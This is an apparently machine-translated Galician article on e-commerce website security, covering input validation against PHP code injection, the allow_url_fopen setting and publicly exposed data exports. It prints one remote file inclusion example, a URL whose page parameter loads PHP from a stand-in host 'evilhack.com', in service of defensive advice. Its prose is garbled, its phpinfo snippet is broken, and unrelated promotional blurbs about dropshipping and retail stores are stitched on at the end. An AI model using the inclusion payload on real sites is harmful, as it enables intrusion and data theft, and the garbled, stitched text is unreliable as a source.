Seguridade en un sitio web de comercio electrónico debe ser unha consideración importante no desenvolvemento dun sitio web de comercio electrónico ou software. Un desenvolvedor é preciso estar en conta todas as consideracións de seguridade ao proxecto un sitio web. Co e-commerce tornándose máis común nos días de hoxe, o número de ataques de seguridade é certamente aumentar. A paranoia é unha cousa saudable para os desenvolvedores e-commerce web, cómpre manter ata o portón con as cuestións de seguridade, e manter os nosos oídos e ollos abertos. Aínda que as lagoas seguintes son graves, as lagoas a continuación se presentan son facilmente corrixidos.
Enumerados a continuación son algunhas consideracións de seguridade a seren incluídos no desenvolvemento dun sitio web. Este artigo non cobre furto e-mail, por favor, vexa meu artigo separado sobre esta materia.
A entrada do usuario - rexistro, sexa entrando nunha cantidade, en busca dun producto, escribir un nome etc, ten que ser validado para os personaxes sospeitosos. Se isto non é feito, é posible entrar "?>", as etiquetas de peche do PHP e executar un código PHP.
É moito máis seguro permitir números e caracteres AZ (maiúsculas incluído) e 0-9, e nada máis, en vez de facer unha lista de todas as características que non deberían estar alí. O script precisa de validación para percorrer cada personaxe, un por un. Isto ten que ser feito empregando a validación do lado do servidor, non Javascript. Usando a validación de entrada do lado do servidor é esencial para manter os caracteres indesejados
Hai outro importante durante a execución de código PHP. Cando usar PHP existe unha configuración chamada allow_url_fopen que permite a apertura de arquivos dende un script PHP. Esta configuración debe ser desactivado, salvo que absolutamente necesario.
Imaxina que tes scripts PHP para ambos os cabezallos e zócolos, e para acceder as súas páxinas debes escribir no http://www.mysite.com/index.php?page=page2. Todo que toma é un usuario mal intencionado para executar un script, modificando os parámetros escribindo "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" con un código PHP no arquivo "hacker.txt". Vostede podería ter calquera cousa acontecer, PHP arquivos lidos, borrado, información vital roubo.
Se non está seguro de se esa configuración está activado ou desactivado, Copie o seguinte código PHP nun arquivo de texto, e enviá-lo para o servidor web:
phpinfo ();
?>
Cando vostede accede ao seu guión do seu servidor web, ten que poñerse en toda a allow_url_fopen axuste na configuración.
Un usuario de ordenador, en circunstancias normais, non pode atopar o valor desa configuración.
Teña coidado cos datos exportados, como orde, produtos en CSV e arquivos de MySQL. Se eses datos son exportados dun script e é mantido no servidor web, ou sexa, común en virtude de un nome de arquivo. http://www.mysite.com/admin/output_tables.csv. Isto só é realmente un problema cando os datos exportados reside nun arquivo en un directorio que é accesíbel ao público. Hai dous xeitos de evitar esa fenda de seguridade - Primeiro temos o arquivo de saída por tras dun directorio protexido por contrasinal, por outra banda temos os datos localizados dentro dun elemento de formulario HTML Textarea en un script. O lojista pode copiar a información do ficheiro de texto e crear un novo arquivo no seu ordenador e pegar a información aquí.
Todo que toma é un hacker para atopar ese nome por comprobar o e-commerce software sitio demo e ollar para o mesmo nome nun sitio real.
Alistada embaixo máis artigos relacionados ao artigo anterior da categoría do artigo do comercio electrónico ".
Os pobos interesados no artigo anterior do "E-Commerce Seguridade - Conectar a fallos de seguridade" están interesados como nos artigos relacionados alistada a continuación:
Executando un negocio de comercio electrónico non é só sobre como manter o seu sitio funcionando. Os clientes confían na súa capacidade de atender-los vía teléfono, fax, correo electrónico ou outros medios, e que esixe tódolos seus sistemas a funcionar para poder satisfacer as peticións dos clientes.
Só un par de días eu estaba tendo unha conversa con meu amigo. Estaba celebrando o aniversario do seu bebé 1 e tivo que executar entre a súa terra natal, en Kerala e Chennai, seu lugar de traballo. El ea súa cara-metade viaxou entre estes lugares, polo menos, 4 veces nun mes pasado.
Se está a facer e-commerce a calquera cantidade de tempo, se tería sabido que existen Scamers máis xenuína de prestadores de servizos de directorio por xunto dropship. No mundo do e-business, e Salehoo Worldwide Brands ambos son os prestadores de servizos respectábel que gañaron popularidade nos últimos anos.
Se xa foi unha tenda en liña, probabelmente vostede xa escoitou falar sobre Salehoo ou mesmo utilizou a súa vantaxe. Se vostede está só comezando a fóra coa súa empresa, pode ser confundido co Salehoo mestura opinións alí fora. Agora, imos dar un ollo ao que Salehoo é realmente todo e sobre os servizos que ofrecen, que moitos tenden a neglixencia.
Cantas persoas coñeces que teña compras en algo? Se o teu gusto min moi poucos, por iso é ecommerce shopping do mundo novo de compra en liña. Pero, quen fai estas tendas de venda polo miúdo en liña? Persoas como eu e ti, é por iso que este negocio está crecendo e vai seguir a medrar, agora e no futuro.
Se vostede é un grande fan dos máis recentes produtos electrónicos, pode ser tentado pola idea de realizar o seu propio negocio en liña electrónica. Non é tan difícil para comezar cando aproveitar o máximo partido da caída de dereito marítimo servizo electrónica e hai abundancia para elixir.
Algunha vez entrar na súa tenda de barrio local e saber o que sería como se de pertencer a vostede? Quere ser un bo propietario, será o pobo gusta de ti? Pois este artigo vai amosar-lle os beneficios de ter a súa propia tenda de venda polo miúdo, ou vulgarmente coñecido como e-commerce que difire dunha tenda de barrio local real.
